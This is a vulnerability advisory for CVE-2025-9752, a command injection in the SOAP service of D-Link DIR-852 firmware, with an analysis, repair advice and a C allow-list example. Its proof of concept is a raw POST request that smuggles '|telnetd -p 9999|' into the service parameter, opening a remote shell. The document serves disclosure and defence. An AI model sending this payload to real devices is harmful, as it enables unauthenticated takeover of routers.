Description
D-Link DIR-852 1.00CNB09 devices soapcgi_main Command Injection
CVE-2025-9752
Vendor: D-Link
Product: DIR-852
Version: 1.00 CNB09
Type: Command Injection
Author:iC0rner
Vulnerability description
A critical command injection vulnerability exists in the SOAP service of the firmware for the D-Link DIR-852. The vulnerability allows an unauthenticated, remote attacker to execute arbitrary system commands by sending a specially crafted network packet.
Analysis
In the soapcgi_main function of the htodcs/cgibin binary, when a POST request is made to the SOAP service, the content following ?service= in the request URI is used to construct a system command. This user-supplied value is concatenated directly into a command format string (the string at byte_437CE0), and the resulting command is then executed. Because the value is never sanitized, this is a command injection vulnerability.
PoC
The payload |telnetd -p 9999| is injected into the service parameter in the URI, causing the device to start a telnet daemon on port 9999.
nc 192.168.0.1 49152
POST /soap.cgi?service=|telnetd -p 9999| HTTP/1.1
Host: 192.168.0.1:49152
Accept-Encoding: identity
Content-Length: 16
SOAPAction: "whatever-serviceType#whatever-action"
Content-Type: text/xml
whatever content...
nc 192.168.0.1 9999
Suggested repair
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Whitelist Approach:
A whitelist should be used to define the set of valid services to prevent malicious user input. When processing the service content, the application should check if the value exactly matches an item in the whitelist. If the input does not match any whitelist entry, the request should be rejected immediately instead of being parsed or concatenated.
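The following C code is an added example of the allow-list check described above; it is not D-Link's code, and the service names, handler path and format string are assumptions standing in for whatever the firmware actually uses. The point it shows is that the command is built only from a constant chosen by index, never from the request's service value.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical allow-list of valid SOAP service names (the real set is firmware-specific). */
static const char *const ALLOWED_SERVICES[] = {
    "WANIPConnection", "Layer3Forwarding", "WANCommonInterfaceConfig"
};

/* Exact-match lookup: returns the index of svc in ALLOWED_SERVICES, or -1 if not listed. */
int lookup_service(const char *svc) {
    size_t n = sizeof ALLOWED_SERVICES / sizeof ALLOWED_SERVICES[0];
    if (svc == NULL) return -1;
    for (size_t i = 0; i < n; i++)
        if (strcmp(svc, ALLOWED_SERVICES[i]) == 0) return (int)i;
    return -1;
}

/* Copies the value of service= from a query string into out; returns 0 on success,
 * -1 if the parameter is absent or the value does not fit in out. */
int get_service_param(const char *query, char *out, size_t outlen) {
    const char *p = query;
    while (p && *p) {
        if (strncmp(p, "service=", 8) == 0) {
            const char *v = p + 8;
            size_t len = strcspn(v, "&");   /* value ends at next '&' or end of string */
            if (len >= outlen) return -1;
            memcpy(out, v, len);
            out[len] = '\0';
            return 0;
        }
        p = strchr(p, '&');                 /* advance to the next parameter, if any */
        if (p) p++;
    }
    return -1;
}

/* Builds the handler command only for an allow-listed service; returns 0 and fills cmd,
 * or -1 to reject the request. The user value itself is never placed in the command. */
int build_service_command(const char *query, char *cmd, size_t cmdlen) {
    char svc[64];
    if (get_service_param(query, svc, sizeof svc) != 0) return -1;
    int idx = lookup_service(svc);
    if (idx < 0) return -1;
    /* Hypothetical handler path; the firmware's real format string would go here. */
    snprintf(cmd, cmdlen, "/bin/sh /etc/soap/%s.sh", ALLOWED_SERVICES[idx]);
    return 0;
}
```

A request whose service value is not an exact allow-list entry, including the PoC payload above, is rejected before any command string exists.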